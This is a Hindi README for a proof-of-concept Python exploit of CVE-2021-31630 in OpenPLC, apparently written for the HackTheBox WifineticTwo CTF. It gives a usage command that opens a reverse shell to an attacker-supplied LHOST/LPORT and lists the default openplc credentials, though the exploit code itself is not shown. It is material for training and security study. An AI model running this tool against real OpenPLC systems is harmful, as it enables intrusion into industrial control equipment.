
HTB WifineticTwo CTF पर CVE-2021-31630 का शोषण करने के लिए एक सरल python स्क्रिप्ट
यह Python स्क्रिप्ट CVE-2021-31630 के लिए एक प्रूफ ऑफ कॉन्सेप्ट (PoC) शोषण है, जो HackTheBox पर WifineticTwo बॉक्स पर चलने वाले OpenPLC में एक कमजोरी को लक्षित करता है। यह केवल शैक्षिक उद्देश्यों के लिए डिज़ाइन किया गया है, जिसका उद्देश्य नियंत्रित वातावरण में शोषण प्रक्रिया को प्रदर्शित करना है।
यह उपकरण केवल सुरक्षा अनुसंधान और शैक्षिक उद्देश्यों के लिए है। पूर्व आपसी सहमति के बिना लक्ष्यों पर हमला करने के लिए इस उपकरण का उपयोग अवैध है। डेवलपर इस शोषण का दुरुपयोग करने वाले उपयोगकर्ताओं के खिलाफ किसी भी नुकसान या आपराधिक आरोपों के लिए जिम्मेदार नहीं होगा।
इस शोषण को चलाने से पहले, सुनिश्चित करें कि आपके पास:
requests लाइब्रेरी स्थापित है। आप इसे pip install requests का उपयोग करके स्थापित कर सकते हैं।इस शोषण का उपयोग करने के लिए, आपको लक्ष्य का URL, स्थानीय होस्ट IP (LHOST), और स्थानीय पोर्ट (LPORT) निर्दिष्ट करना होगा जिस पर रिवर्स शेल को वापस कनेक्ट करना चाहिए। वैकल्पिक रूप से, यदि वे डिफ़ॉल्ट से भिन्न हैं तो आप OpenPLC के लिए उपयोगकर्ता नाम और पासवर्ड निर्दिष्ट कर सकते हैं।
./exploit.py --target http://wifinetictwo.htb:8080 --lhost [LHOST] --lport [LPORT] [--usr [USERNAME] --pwd [PASSWORD]]
--target - लक्ष्य का आधार पता। उदाहरण: http://wifinetictwo.htb:8080--lhost - रिवर्स शेल के वापस कनेक्ट होने के लिए स्थानीय होस्ट IP पता।--lport - रिवर्स शेल के वापस कनेक्ट होने के लिए स्थानीय पोर्ट।--usr - (वैकल्पिक) OpenPLC के लिए उपयोगकर्ता नाम। डिफ़ॉल्ट openplc है।--pwd - (वैकल्पिक) OpenPLC के लिए पासवर्ड। डिफ़ॉल्ट openplc है।